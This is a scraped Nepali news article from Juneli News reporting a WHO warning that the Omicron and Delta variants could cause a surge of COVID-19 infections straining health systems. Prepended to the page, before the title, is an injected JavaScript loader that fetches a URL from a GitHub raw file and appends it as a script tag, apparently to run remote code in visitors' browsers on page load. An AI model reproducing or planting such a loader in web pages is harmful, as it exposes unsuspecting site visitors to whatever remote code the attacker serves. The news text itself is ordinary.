;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); कोभीड १९ को नयाँ भेरियन्टले ठूलो महामारी ल्याउने डब्लुएचओ को चेतावनी – जुनेली न्युज
बुधबार, असार १२, २०८२
  • होमपेज
  • कोभीड १९ को नयाँ भेरियन्टले ठूलो महामारी ल्याउने डब्लुएचओ को चेतावनी
Breaking News

कोभीड १९ को नयाँ भेरियन्टले ठूलो महामारी ल्याउने डब्लुएचओ को चेतावनी

जुनेली न्युज, काठमाडौं। कोरोना भाइरसको नयाँ भेरियन्ट ओमिक्रिन र डेल्टाले कोभिड १९ को ठूलो महामारी ल्याउन सक्ने डब्लु एच ओ ले चेतावनी दिएको छ।

 बुधबार विश्व स्वास्थ्य संगठन (डब्ल्यूएचओ) का महानिर्देशक टेड्रोस अडानोम गेब्रेयससले ओमिक्रोन र डेल्टा भेरियन्टले कोभिड-१९ संक्रमणको सुनामी ल्याउन सक्ने चेतावनी दिएका हुन् । कोभिड संक्रमणको सुनामीले स्वास्थ्य प्रणालीमा अत्यधिक चाप पार्ने पनि उनको भनाइ थियो ।

स्रोत अनलाइखबर

फेसबुक प्रतिक्रियाहरु